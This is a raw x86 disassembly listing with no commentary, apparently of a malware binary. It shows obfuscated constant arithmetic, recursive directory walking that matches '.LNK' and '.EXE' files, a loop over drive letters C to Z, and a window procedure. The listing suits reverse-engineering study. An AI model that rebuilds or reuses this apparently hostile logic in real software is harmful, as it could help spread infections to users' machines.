var_112 = byte ptr -112h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 254h
push ebx
push esi
push edi
mov esi, [ebp+arg_0]
cmp [ebp+arg_8], 0
jz short loc_41D5AA
mov eax, ds:1001424Ch
movsx edx, word ptr ds:10014220h
add eax, edx
sub eax, 10h
mov [ebp+var_248], eax
jmp loc_41D635
; ---------------------------------------------------------------------------
loc_41D5AA: ; CODE XREF: sub_41D579+13�j
mov edx, [ebp+arg_4]
mov ecx, ds:100141BCh
add ecx, ds:10014124h
sub ecx, 5
cmp ds:100105E0h[edx*4], ecx
jnz short loc_41D5E1
push ebx
call dword ptr ds:100105BCh
mov eax, ds:10014238h
add eax, ds:100140DCh
sub eax, 8
push eax
call dword ptr ds:10013840h
loc_41D5E1: ; CODE XREF: sub_41D579+4A�j
mov eax, ds:10014198h
add eax, 5Bh
mov [ebp+var_248], eax
push 100154B4h
call sub_41B08F
push [ebp+arg_4]
push eax
lea edx, [ebp+var_252]
push edx
call dword ptr ds:10013810h
add esp, 10h
lea eax, [ebp+var_252]
push eax
call dword ptr ds:10013844h
cmp eax, 3
jnz short loc_41D635
mov eax, ds:10014208h
add eax, 122h
add eax, ds:10014104h
mov [ebp+var_248], eax
loc_41D635: ; CODE XREF: sub_41D579+2C�j
; sub_41D579+A4�j
xor edi, edi
inc edi
push 100154ADh
call sub_41B08F
push esi
push eax
lea edx, [ebp+var_242]
push edx
call dword ptr ds:10013810h
add esp, 10h
mov ecx, esi
or eax, 0FFFFFFFFh
loc_41D659: ; CODE XREF: sub_41D579+E5�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_41D659
mov ecx, ds:10014244h
add ecx, ds:100140ACh
sub ecx, 9
mov edx, eax
sub edx, ecx
cmp byte ptr [esi+edx], 2Eh
jnz loc_41D710
lea ecx, [esi]
or eax, 0FFFFFFFFh
loc_41D682: ; CODE XREF: sub_41D579+10E�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_41D682
mov ecx, ds:10014154h
add ecx, 1
mov edx, eax
sub edx, ecx
movsx edx, byte ptr [esi+edx]
push edx
call dword ptr ds:1000D034h
add esp, 4
cmp eax, 4Ch
jnz short loc_41D710
lea ecx, [esi]
or eax, 0FFFFFFFFh
loc_41D6AE: ; CODE XREF: sub_41D579+13A�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_41D6AE
mov ecx, ds:100141C4h
add ecx, 2
mov edx, eax
sub edx, ecx
movsx edx, byte ptr [esi+edx]
push edx
call dword ptr ds:1000D034h
add esp, 4
cmp eax, 4Eh
jnz short loc_41D710
lea ecx, [esi]
or eax, 0FFFFFFFFh
loc_41D6DA: ; CODE XREF: sub_41D579+166�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_41D6DA
mov ecx, ds:100140D0h
add ecx, 1
add ecx, ds:100140DCh
mov edx, eax
sub edx, ecx
movsx edx, byte ptr [esi+edx]
push edx
call dword ptr ds:1000D034h
add esp, 4
cmp eax, 4Bh
jnz short loc_41D710
push esi
call sub_424EDB
add esp, 4
loc_41D710: ; CODE XREF: sub_41D579+FE�j
; sub_41D579+12E�j ...
mov ecx, esi
or eax, 0FFFFFFFFh
loc_41D715: ; CODE XREF: sub_41D579+1A1�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_41D715
mov ecx, ds:10014238h
sub ecx, 4
mov edx, eax
sub edx, ecx
cmp byte ptr [esi+edx], 2Eh
jnz loc_41D7D0
lea ecx, [esi]
or eax, 0FFFFFFFFh
loc_41D738: ; CODE XREF: sub_41D579+1C4�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_41D738
movsx ecx, word ptr ds:100141F0h
add ecx, 2
mov edx, eax
sub edx, ecx
movsx edx, byte ptr [esi+edx]
push edx
call dword ptr ds:1000D034h
add esp, 4
cmp eax, 45h
jnz short loc_41D7D0
lea ecx, [esi]
or eax, 0FFFFFFFFh
loc_41D765: ; CODE XREF: sub_41D579+1F1�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_41D765
mov edx, eax
mov ecx, ds:100141D0h
movsx eax, word ptr ds:100140E8h
add ecx, eax
sub ecx, 6
sub edx, ecx
movsx edx, byte ptr [esi+edx]
push edx
call dword ptr ds:1000D034h
add esp, 4
cmp eax, 58h
jnz short loc_41D7D0
lea ecx, [esi]
or eax, 0FFFFFFFFh
loc_41D79A: ; CODE XREF: sub_41D579+226�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_41D79A
mov ecx, ds:1001420Ch
sub ecx, 5
mov edx, eax
sub edx, ecx
movsx edx, byte ptr [esi+edx]
push edx
call dword ptr ds:1000D034h
add esp, 4
cmp eax, 45h
jnz short loc_41D7D0
push [ebp+var_248]
push esi
call sub_423806
add esp, 8
loc_41D7D0: ; CODE XREF: sub_41D579+1B4�j
; sub_41D579+1E5�j ...
lea eax, [ebp+var_13E]
push eax
lea eax, [ebp+var_242]
push eax
call dword ptr ds:1001121Ch
mov ebx, eax
mov eax, ds:100141ACh
add eax, ds:100141D4h
sub eax, 9
neg eax
cmp ebx, eax
jz loc_41D8B5
cmp [ebp+var_112], 2Eh
jz loc_41D8B1
push 100154A4h
call sub_41B08F
lea edx, [ebp+var_112]
push edx
push esi
push eax
lea edx, [ebp+var_242]
push edx
call dword ptr ds:10013810h
push [ebp+arg_8]
push [ebp+arg_4]
lea eax, [ebp+var_242]
push eax
call sub_41D579
add esp, 20h
jmp short loc_41D8B1
; ---------------------------------------------------------------------------
loc_41D842: ; CODE XREF: sub_41D579+33A�j
lea eax, [ebp+var_13E]
push eax
push ebx
call dword ptr ds:1000EFB4h
mov edi, eax
or edi, edi
jnz short loc_41D873
mov eax, [ebp+var_248]
add eax, ds:10013818h
push eax
call dword ptr ds:1001380Ch
pop ecx
push ebx
call dword ptr ds:100105BCh
jmp short loc_41D8B5
; ---------------------------------------------------------------------------
loc_41D873: ; CODE XREF: sub_41D579+2DB�j
cmp [ebp+var_112], 2Eh
jz short loc_41D8B1
push 1001549Bh
call sub_41B08F
lea edx, [ebp+var_112]
push edx
push esi
push eax
lea edx, [ebp+var_242]
push edx
call dword ptr ds:10013810h
push [ebp+arg_8]
push [ebp+arg_4]
lea eax, [ebp+var_242]
push eax
call sub_41D579
add esp, 20h
loc_41D8B1: ; CODE XREF: sub_41D579+28C�j
; sub_41D579+2C7�j ...
or edi, edi
jnz short loc_41D842
loc_41D8B5: ; CODE XREF: sub_41D579+27F�j
; sub_41D579+2F8�j
pop edi
pop esi
pop ebx
leave
retn
sub_41D579 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D8BA proc near ; CODE XREF: sub_41AF48+137�p
; sub_41D8BA+27C�p ...
var_26C = dword ptr -26Ch
var_268 = byte ptr -268h
var_260 = dword ptr -260h
var_25C = dword ptr -25Ch
var_258 = word ptr -258h
var_256 = word ptr -256h
var_252 = word ptr -252h
var_250 = word ptr -250h
var_24E = word ptr -24Eh
var_248 = dword ptr -248h
var_242 = byte ptr -242h
var_13E = byte ptr -13Eh
var_112 = byte ptr -112h
arg_0 = dword ptr 8
arg_8 = byte ptr 10h
arg_18 = byte ptr 20h
arg_20 = dword ptr 28h
arg_24 = dword ptr 2Ch
push ebp
mov ebp, esp
sub esp, 26Ch
push ebx
push esi
push edi
push 0
call dword ptr ds:1001380Ch
xor ebx, ebx
inc ebx
push 10015493h
call sub_41B08F
push [ebp+arg_0]
push eax
lea edi, [ebp+var_242]
push edi
call dword ptr ds:10013810h
add esp, 14h
lea eax, [ebp+var_13E]
push eax
lea eax, [ebp+var_242]
push eax
call dword ptr ds:1001121Ch
mov [ebp+var_248], eax
mov ecx, ds:10014230h
sub ecx, 6
neg ecx
cmp eax, ecx
jnz loc_41DAEA
mov eax, ds:100141C8h
sub eax, 2
cmp [ebp+arg_20], eax
ja loc_41DBB3
mov eax, ds:10014208h
add eax, 3FAh
cmp [ebp+arg_24], eax
jnb short loc_41D959
movsx eax, word ptr ds:10014144h
mov edx, ds:1001416Ch
lea eax, [eax+edx+99h]
cmp [ebp+arg_24], eax
jnz loc_41DBB3
loc_41D959: ; CODE XREF: sub_41D8BA+80�j
movsx eax, word ptr ds:10014120h
add eax, 30D37h
cmp [ebp+arg_24], eax
ja loc_41DBB3
lea eax, [ebp+arg_18]
push eax
lea eax, [ebp+arg_8]
push eax
call dword ptr ds:10013960h
mov [ebp+var_260], eax
movsx eax, word ptr ds:1001412Ch
add eax, ds:10014104h
sub eax, 0Ch
cmp [ebp+var_260], eax
jge short loc_41D9A7
lea edi, [ebp+var_268]
lea esi, [ebp+arg_18]
movsd
movsd
jmp short loc_41D9B2
; ---------------------------------------------------------------------------
loc_41D9A7: ; CODE XREF: sub_41D8BA+DE�j
lea edi, [ebp+var_268]
lea esi, [ebp+arg_8]
movsd
movsd
loc_41D9B2: ; CODE XREF: sub_41D8BA+EB�j
lea eax, [ebp+var_258]
push eax
lea eax, [ebp+var_268]
push eax
call dword ptr ds:10013958h
mov eax, ds:1001424Ch
mov edx, ds:1001417Ch
mov ecx, ds:100140BCh
mov [ebp+var_26C], ecx
movzx esi, [ebp+var_24E]
movzx edi, [ebp+var_250]
movsx ecx, word ptr ds:100141B8h
lea eax, [eax+ecx+2Eh]
mov ecx, edi
imul ecx, eax
mov eax, esi
add eax, ecx
movzx ecx, [ebp+var_252]
mov esi, ds:100141D0h
lea edx, [edx+esi+0Ah]
imul ecx, edx
movsx edx, word ptr ds:100140E4h
mov esi, [ebp+var_26C]
lea edx, [edx+esi+38h]
imul ecx, edx
add eax, ecx
movzx edx, [ebp+var_256]
mov ecx, ds:100141C8h
add ecx, 1Ch
imul edx, ecx
movsx ecx, word ptr ds:10014090h
add ecx, 13h
imul edx, ecx
mov ecx, ds:10014214h
add ecx, 3Bh
imul edx, ecx
add eax, edx
movzx edx, [ebp+var_258]
mov ecx, ds:100141A0h
lea ecx, [esi+ecx+0Ah]
imul edx, ecx
mov ecx, ds:100140FCh
add ecx, 17h
imul edx, ecx
mov ecx, ds:1001424Ch
add ecx, 0Fh
imul edx, ecx
mov ecx, ds:1001417Ch
add ecx, 33h
imul edx, ecx
add eax, edx
mov [ebp+var_25C], eax
mov edx, ds:1000D028h
cmp eax, edx
ja loc_41DBB3
sub edx, eax
mov eax, ds:10014238h
add eax, 0Bh
cmp edx, eax
jnb loc_41DBB3
mov eax, ds:1001419Ch
add eax, 9Bh
cmp [ebp+arg_24], eax
jz short loc_41DAD8
push 0
push [ebp+arg_0]
call sub_41EF87
add esp, 8
jmp loc_41DBB3
; ---------------------------------------------------------------------------
loc_41DAD8: ; CODE XREF: sub_41D8BA+20A�j
push 1
push [ebp+arg_0]
call sub_41EF87
add esp, 8
jmp loc_41DBB3
; ---------------------------------------------------------------------------
loc_41DAEA: ; CODE XREF: sub_41D8BA+5C�j
cmp [ebp+var_112], 2Eh
jz loc_41DBAF
push 1001548Ah
call sub_41B08F
lea edi, [ebp+var_112]
push edi
push [ebp+arg_0]
push eax
lea edi, [ebp+var_242]
push edi
call dword ptr ds:10013810h
lea esi, [ebp+var_13E]
sub esp, 140h
mov edi, esp
mov ecx, 9Fh
rep movsw
lea edi, [ebp+var_242]
push edi
call sub_41D8BA
add esp, 158h
jmp short loc_41DBAF
; ---------------------------------------------------------------------------
loc_41DB43: ; CODE XREF: sub_41D8BA+2F7�j
lea eax, [ebp+var_13E]
push eax
push [ebp+var_248]
call dword ptr ds:1000EFB4h
mov ebx, eax
or ebx, ebx
jz short loc_41DBB3
cmp [ebp+var_112], 2Eh
jz short loc_41DBAF
push 10015481h
call sub_41B08F
lea edi, [ebp+var_112]
push edi
push [ebp+arg_0]
push eax
lea edi, [ebp+var_242]
push edi
call dword ptr ds:10013810h
lea esi, [ebp+var_13E]
sub esp, 140h
mov edi, esp
mov ecx, 9Fh
rep movsw
lea edi, [ebp+var_242]
push edi
call sub_41D8BA
add esp, 158h
loc_41DBAF: ; CODE XREF: sub_41D8BA+237�j
; sub_41D8BA+287�j ...
or ebx, ebx
jnz short loc_41DB43
loc_41DBB3: ; CODE XREF: sub_41D8BA+6D�j
; sub_41D8BA+99�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_41D8BA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41DBB8 proc near ; CODE XREF: .data:0041AB43�p
var_1010 = byte ptr -1010h
var_100C = byte ptr -100Ch
var_1003 = byte ptr -1003h
var_FFF = byte ptr -0FFFh
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 1000h
call sub_425D5D
push ebx
push esi
push edi
push 1001546Fh
call sub_41B08F
pop ecx
push 0
push eax
push 0
push [ebp+arg_0]
call dword ptr ds:10013814h
mov edi, eax
or edi, edi
jnz short loc_41DBEA
mov edi, [ebp+arg_0]
loc_41DBEA: ; CODE XREF: sub_41DBB8+2D�j
push 10015459h
call sub_41B08F
pop ecx
push 0
push eax
push 0
push edi
call dword ptr ds:10013814h
mov edi, eax
lea eax, [ebp+var_FFF]
push eax
push 0FFFh
push 0Dh
push edi
call dword ptr ds:1000D014h
mov eax, ds:100140D4h
cmp [ebp+eax+var_FFF], 20h
jnz short loc_41DC43
mov eax, ds:10014108h
movsx edx, word ptr ds:100141DCh
add eax, edx
cmp [ebp+eax+var_1010], 20h
jz loc_41DCF2
loc_41DC43: ; CODE XREF: sub_41DBB8+6D�j
mov eax, ds:1001417Ch
add eax, ds:100141B4h
cmp [ebp+eax+var_100C], 68h
jnz short loc_41DC6B
mov eax, ds:100140ACh
cmp [ebp+eax+var_1003], 74h
jz loc_41DCF2
loc_41DC6B: ; CODE XREF: sub_41DBB8+9E�j
lea ecx, [ebp+var_FFF]
or eax, 0FFFFFFFFh
loc_41DC74: ; CODE XREF: sub_41DBB8+C1�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_41DC74
mov ebx, ds:1001416Ch
add ebx, 6
add ebx, ds:100141ACh
cmp eax, ebx
jb short loc_41DCF2
push 10015454h
call sub_41B08F
mov esi, ds:1001409Ch
add esi, 3
push esi
push eax
lea esi, [ebp+var_FFF]
push esi
call sub_4251A5
add esp, 10h
movsx ebx, word ptr ds:1001421Ch
mov edx, ds:100141E0h
lea ebx, [ebx+edx+0FFF8h]
cmp eax, ebx
jnz short loc_41DCF2
push 1001544Eh
call sub_41B08F
pop ecx
push eax
mov esi, ds:100140DCh
movsx ebx, word ptr ds:10014204h
add esi, ebx
sub esi, 6
push esi
push 0Ch
push edi
call dword ptr ds:1000D014h
loc_41DCF2: ; CODE XREF: sub_41DBB8+85�j
; sub_41DBB8+AD�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_41DBB8 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 230h
push ebx
push esi
push edi
mov esi, [ebp+8]
mov ebx, [ebp+0Ch]
mov eax, ebx
cmp eax, 100h
jz short loc_41DD28
jl loc_41E27D
cmp eax, 111h
jz loc_41DDBD
jmp loc_41E27D
; ---------------------------------------------------------------------------
loc_41DD28: ; CODE XREF: .data:0041DD10�j
cmp dword ptr [ebp+10h], 9
jnz loc_41E27D
mov edi, ds:100141C4h
dec edi
jmp short loc_41DDA6
; ---------------------------------------------------------------------------
loc_41DD3B: ; CODE XREF: .data:0041DDB6�j
mov eax, 30h
mul edi
mov [ebp-208h], eax
cmp ds:10011550h[eax], esi
jnz short loc_41DD70
mov eax, 30h
mul edi
mov [ebp-20Ch], eax
push dword ptr ds:10011554h[eax]
call dword ptr ds:100109FCh
jmp loc_41E27D
; ---------------------------------------------------------------------------
loc_41DD70: ; CODE XREF: .data:0041DD4F�j
mov eax, 30h
mul edi
mov [ebp-20Ch], eax
cmp ds:10011554h[eax], esi
jnz short loc_41DDA5
mov eax, 30h
mul edi
mov [ebp-210h], eax
push dword ptr ds:10011558h[eax]
call dword ptr ds:100109FCh
jmp loc_41E27D
; ---------------------------------------------------------------------------
loc_41DDA5: ; CODE XREF: .data:0041DD84�j
inc edi
loc_41DDA6: ; CODE XREF: .data:0041DD39�j
mov eax, ds:100141A8h
add eax, 58h
add eax, ds:1001422Ch
cmp edi, eax
jb short loc_41DD3B
jmp loc_41E27D
; ---------------------------------------------------------------------------
loc_41DDBD: ; CODE XREF: .data:0041DD1D�j
mov edi, ds:100140C8h
sub edi, 2
jmp short loc_41DDE2
; ---------------------------------------------------------------------------
loc_41DDC8: ; CODE XREF: .data:0041DDEC�j
mov eax, 30h
mul edi
mov [ebp-208h], eax
mov eax, ds:1001155Ch[eax]
cmp [ebp+14h], eax
jz short loc_41DDEE
inc edi
loc_41DDE2: ; CODE XREF: .data:0041DDC6�j
mov eax, ds:10014224h
add eax, 5Fh
cmp edi, eax
jb short loc_41DDC8
loc_41DDEE: ; CODE XREF: .data:0041DDDF�j
mov eax, ds:10014094h
add eax, 62h
cmp edi, eax
jz loc_41E27D
push 0FFh
lea eax, [ebp-103h]
push eax
mov eax, 30h
mul edi
mov [ebp-20Ch], eax
push dword ptr ds:10011548h[eax]
call dword ptr ds:10013D88h
mov eax, ds:1001417Ch
add eax, ds:1001409Ch
mov byte ptr [ebp+eax-20Eh], 4Bh
mov eax, ds:100140E0h
mov edx, ds:100141F4h
add edx, ds:100140A4h
sub edx, 0Ch
mov [ebp+eax-205h], dl
lea eax, [ebp-103h]
push eax
lea eax, [ebp-204h]
push eax
call dword ptr ds:1000D024h
add esp, 8
push 0FFh
lea eax, [ebp-103h]
push eax
mov eax, 30h
mul edi
mov [ebp-210h], eax
push dword ptr ds:10011550h[eax]
call dword ptr ds:10013D88h
movsx eax, word ptr ds:10014194h
movsx eax, byte ptr [ebp+eax-10Ch]
movsx edx, word ptr ds:10014120h
movsx ecx, word ptr ds:10014164h
add edx, ecx
sub edx, 0Dh
cmp eax, edx
jnz short loc_41DEFD
push 1001542Bh
call sub_41B08F
pop ecx
mov edx, ds:10014188h
movsx ecx, word ptr ds:100140E4h
add edx, ecx
sub edx, 0Bh
push edx
push 0
push eax
push 0
call dword ptr ds:10013820h
mov eax, 30h
mul edi
mov [ebp-214h], eax
push dword ptr ds:10011550h[eax]
call dword ptr ds:100109FCh
jmp loc_41E27D
; ---------------------------------------------------------------------------
loc_41DEFD: ; CODE XREF: .data:0041DEB3�j
push 10015426h
call sub_41B08F
push eax
lea edx, [ebp-204h]
push edx
call dword ptr ds:1000D024h
lea eax, [ebp-103h]
push eax
lea eax, [ebp-204h]
push eax
call dword ptr ds:1000D024h
add esp, 14h
push 0FFh
lea eax, [ebp-103h]
push eax
mov eax, 30h
mul edi
mov [ebp-214h], eax
push dword ptr ds:10011554h[eax]
call dword ptr ds:10013D88h
mov eax, ds:100141E0h
movsx edx, word ptr ds:1001412Ch
add eax, edx
movsx eax, byte ptr [ebp+eax-10Ch]
mov edx, ds:100141ECh
sub edx, 6
cmp eax, edx
jnz short loc_41DFB5
push 10015404h
call sub_41B08F
pop ecx
movsx edx, word ptr ds:1001421Ch
sub edx, 6
push edx
push 0
push eax
push 0
call dword ptr ds:10013820h
mov eax, 30h
mul edi
mov [ebp-218h], eax
push dword ptr ds:10011554h[eax]
call dword ptr ds:100109FCh
jmp loc_41E27D
; ---------------------------------------------------------------------------
loc_41DFB5: ; CODE XREF: .data:0041DF73�j
push 100153FFh
call sub_41B08F
push eax
lea edx, [ebp-204h]
push edx
call dword ptr ds:1000D024h
lea eax, [ebp-103h]
push eax
lea eax, [ebp-204h]
push eax
call dword ptr ds:1000D024h
add esp, 14h
push 0FFh
lea eax, [ebp-103h]
push eax
mov eax, 30h
mul edi
mov [ebp-218h], eax
push dword ptr ds:10011558h[eax]
call dword ptr ds:10013D88h
movsx eax, word ptr ds:100141F0h
add eax, ds:1001409Ch
movsx eax, byte ptr [ebp+eax-106h]
movsx edx, word ptr ds:10014110h
cmp eax, edx
jz loc_41E15C
lea ecx, [ebp-103h]
or eax, 0FFFFFFFFh
loc_41E037: ; CODE XREF: .data:0041E03C�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_41E037
movsx ecx, word ptr ds:10014180h
sub ecx, 1
cmp eax, ecx
jb loc_41E15C
mov eax, ds:10014248h
add eax, ds:100140E0h
sub eax, 2
mov [ebp-105h], al
jmp short loc_41E088
; ---------------------------------------------------------------------------
loc_41E066: ; CODE XREF: .data:0041E0A1�j
movzx eax, byte ptr [ebp-105h]
mov al, [ebp+eax-103h]
cmp al, 30h
jl short loc_41E07C
cmp al, 39h
jle short loc_41E081
loc_41E07C: ; CODE XREF: .data:0041E076�j
jmp loc_41E15C
; ---------------------------------------------------------------------------
loc_41E081: ; CODE XREF: .data:0041E07A�j
add byte ptr [ebp-105h], 1
loc_41E088: ; CODE XREF: .data:0041E064�j
lea ecx, [ebp-103h]
or eax, 0FFFFFFFFh
loc_41E091: ; CODE XREF: .data:0041E096�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_41E091
movzx ecx, byte ptr [ebp-105h]
cmp ecx, eax
jb short loc_41E066
movsx eax, word ptr ds:1001411Ch
add eax, ds:1001422Ch
sub eax, 8
mov [ebp-104h], al
jmp short loc_41E138
; ---------------------------------------------------------------------------
loc_41E0BB: ; CODE XREF: .data:0041E151�j
mov al, [ebp-104h]
mov [ebp-219h], al
jmp short loc_41E0F2
; ---------------------------------------------------------------------------
loc_41E0C9: ; CODE XREF: .data:0041E10B�j
movzx eax, byte ptr [ebp-219h]
movsx eax, byte ptr [ebp+eax-103h]
movzx edx, byte ptr [ebp-104h]
movsx edx, byte ptr [ebp+edx-103h]
cmp eax, edx
jnz short loc_41E10D
add byte ptr [ebp-219h], 1
loc_41E0F2: ; CODE XREF: .data:0041E0C7�j
lea ecx, [ebp-103h]
or eax, 0FFFFFFFFh
loc_41E0FB: ; CODE XREF: .data:0041E100�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_41E0FB
movzx ecx, byte ptr [ebp-219h]
cmp ecx, eax
jb short loc_41E0C9
loc_41E10D: ; CODE XREF: .data:0041E0E9�j
movzx eax, byte ptr [ebp-219h]
movzx edx, byte ptr [ebp-104h]
sub eax, edx
movsx edx, word ptr ds:100140B8h
add edx, ds:100141A0h
sub edx, 6
cmp eax, edx
jg short loc_41E15C
add byte ptr [ebp-104h], 1
loc_41E138: ; CODE XREF: .data:0041E0B9�j
lea ecx, [ebp-103h]
or eax, 0FFFFFFFFh
loc_41E141: ; CODE XREF: .data:0041E146�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_41E141
movzx ecx, byte ptr [ebp-104h]
cmp ecx, eax
jb loc_41E0BB
jmp loc_41E1F6
; ---------------------------------------------------------------------------
loc_41E15C: ; CODE XREF: .data:0041E028�j
; .data:0041E04A�j ...
mov eax, ds:1001424Ch
add eax, 7BEh
add eax, ds:10014108h
push eax
call dword ptr ds:1001380Ch
push 100153C6h
call sub_41B08F
mov [ebp-21Ch], eax
push 100153AFh
call sub_41B08F
mov edx, ds:100141BCh
add edx, ds:10014234h
sub edx, 6
push edx
push eax
mov edx, [ebp-21Ch]
push edx
push 0
call dword ptr ds:10013820h
push 100153ABh
call sub_41B08F
add esp, 10h
push eax
mov eax, 30h
mul edi
mov [ebp-220h], eax
mov edx, eax
push dword ptr ds:10011558h[edx]
call dword ptr ds:10013834h
mov eax, 30h
mul edi
mov [ebp-224h], eax
push dword ptr ds:10011558h[eax]
call dword ptr ds:100109FCh
jmp loc_41E27D
; ---------------------------------------------------------------------------
loc_41E1F6: ; CODE XREF: .data:0041E157�j
push 100153A6h
call sub_41B08F
push eax
lea edx, [ebp-204h]
push edx
call dword ptr ds:1000D024h
lea eax, [ebp-103h]
push eax
lea eax, [ebp-204h]
push eax
call dword ptr ds:1000D024h
mov eax, 30h
mul edi
mov [ebp-228h], eax
push dword ptr ds:10011548h[eax]
call dword ptr ds:100111E8h
lea eax, [ebp-204h]
push eax
call dword ptr ds:1000E000h
add esp, 18h
push 5
mov eax, 30h
mul edi
mov [ebp-22Ch], eax
push dword ptr ds:10011544h[eax]
call dword ptr ds:10013838h
mov eax, 30h
mul edi
mov [ebp-230h], eax
and dword ptr ds:10011540h[eax], 0
loc_41E27D: ; CODE XREF: .data:0041DD12�j
; .data:0041DD23�j ...
mov edi, ds:10014104h
sub edi, 4
jmp loc_41E35F
; ---------------------------------------------------------------------------
loc_41E28B: ; CODE XREF: .data:0041E369�j
mov eax, 30h
mul edi
mov [ebp-8], eax
cmp esi, ds:10011550h[eax]
jnz short loc_41E2C2
push dword ptr [ebp+14h]
push dword ptr [ebp+10h]
push ebx
push esi
mov eax, 30h
mul edi
mov [ebp-0Ch], eax
push dword ptr ds:10011560h[eax]
call dword ptr ds:100137DCh
jmp loc_41E36F
; ---------------------------------------------------------------------------
loc_41E2C2: ; CODE XREF: .data:0041E29C�j
mov eax, 30h
mul edi
mov [ebp-10h], eax
cmp esi, ds:10011554h[eax]
jnz short loc_41E2F6
push dword ptr [ebp+14h]
push dword ptr [ebp+10h]
push ebx
push esi
mov eax, 30h
mul edi
mov [ebp-14h], eax
push dword ptr ds:10011564h[eax]
call dword ptr ds:100137DCh
jmp short loc_41E36F
; ---------------------------------------------------------------------------
loc_41E2F6: ; CODE XREF: .data:0041E2D3�j
mov eax, 30h
mul edi
mov [ebp-18h], eax
cmp esi, ds:10011558h[eax]
jnz short loc_41E32A
push dword ptr [ebp+14h]
push dword ptr [ebp+10h]
push ebx
push esi
mov eax, 30h
mul edi
mov [ebp-1Ch], eax
push dword ptr ds:10011568h[eax]
call dword ptr ds:100137DCh
jmp short loc_41E36F
; ---------------------------------------------------------------------------
loc_41E32A: ; CODE XREF: .data:0041E307�j
mov eax, 30h
mul edi
mov [ebp-20h], eax
cmp esi, ds:1001154Ch[eax]
jnz short loc_41E35E
push dword ptr [ebp+14h]
push dword ptr [ebp+10h]
push ebx
push esi
mov eax, 30h
mul edi
mov [ebp-24h], eax
push dword ptr ds:1001156Ch[eax]
call dword ptr ds:100137DCh
jmp short loc_41E36F
; ---------------------------------------------------------------------------
loc_41E35E: ; CODE XREF: .data:0041E33B�j
inc edi
loc_41E35F: ; CODE XREF: .data:0041E286�j
mov eax, ds:10014184h
add eax, 63h
cmp edi, eax
jb loc_41E28B
loc_41E36F: ; CODE XREF: .data:0041E2BD�j
; .data:0041E2F4�j ...
pop edi
pop esi
pop ebx
leave
retn 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E376 proc near ; CODE XREF: sub_423599+D9�p
; sub_423599+116�p ...
var_4 = dword ptr -4
arg_0 = byte ptr 8
push ebp
mov ebp, esp
push ecx
push ebx
push edi
movzx eax, [ebp+arg_0]
mov ecx, 2Bh
mov edx, 2FA0BE83h
mul edx
shr edx, 3
mov [ebp+var_4], edx
mov edi, edx
mov ebx, edi
mov [ebp+arg_0], bl
movzx eax, [ebp+arg_0]
mov edx, ds:100140A8h
sub edx, 4
cmp eax, edx
jnz short loc_41E3B1
mov eax, 65h
jmp short loc_41E42D
; ---------------------------------------------------------------------------
loc_41E3B1: ; CODE XREF: sub_41E376+32�j
movzx eax, [ebp+arg_0]
mov edx, ds:10014094h
dec edx
cmp eax, edx
jnz short loc_41E3C7
mov eax, 79h
jmp short loc_41E42D
; ---------------------------------------------------------------------------
loc_41E3C7: ; CODE XREF: sub_41E376+48�j
movzx eax, [ebp+arg_0]
mov edx, ds:100140ACh
add edx, ds:10014198h
sub edx, 0Ch
cmp eax, edx
jnz short loc_41E3E5
mov eax, 75h
jmp short loc_41E42D
; ---------------------------------------------------------------------------
loc_41E3E5: ; CODE XREF: sub_41E376+66�j
movzx eax, [ebp+arg_0]
mov edx, ds:100141B0h
sub edx, 4
cmp eax, edx
jnz short loc_41E3FD
mov eax, 69h
jmp short loc_41E42D
; ---------------------------------------------------------------------------
loc_41E3FD: ; CODE XREF: sub_41E376+7E�j
movzx eax, [ebp+arg_0]
movsx edx, word ptr ds:100141F0h
add edx, 2
cmp eax, edx
jnz short loc_41E416
mov eax, 6Fh
jmp short loc_41E42D
; ---------------------------------------------------------------------------
loc_41E416: ; CODE XREF: sub_41E376+97�j
movzx eax, [ebp+arg_0]
movsx edx, word ptr ds:10014148h
add edx, 5
cmp eax, edx
jnz short loc_41E42D
mov eax, 61h
loc_41E42D: ; CODE XREF: sub_41E376+39�j
; sub_41E376+4F�j ...
pop edi
pop ebx
leave
retn
sub_41E376 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E431 proc near ; CODE XREF: sub_41F4A9+BC�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 8000h
mov eax, ds:1001414Ch
sub eax, 8
push eax
push [ebp+arg_0]
call dword ptr ds:10012804h
pop ebp
retn
sub_41E431 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 28h
push ebx
push esi
push edi
mov esi, 43h
jmp short loc_41E466
; ---------------------------------------------------------------------------
loc_41E45D: ; CODE XREF: .data:0041E469�j
and dword ptr ds:10013970h[esi*4], 0
inc esi
loc_41E466: ; CODE XREF: .data:0041E45B�j
cmp esi, 5Ah
jbe short loc_41E45D
loc_41E46B: ; CODE XREF: .data:0041E5E9�j
mov edi, 43h
jmp loc_41E5CE
; ---------------------------------------------------------------------------
loc_41E475: ; CODE XREF: .data:0041E5D1�j
mov eax, ds:1001415Ch
movsx edx, word ptr ds:10014160h
add eax, edx
sub eax, 6
push eax
call dword ptr ds:1001380Ch
push 1001539Eh
call sub_41B08F
push edi
push eax
lea ebx, [ebp-0Eh]
push ebx
call dword ptr ds:10013810h
add esp, 14h
cmp dword ptr ds:10013970h[edi*4], 0
jz short loc_41E4EA
mov eax, ds:10014244h
sub eax, 9
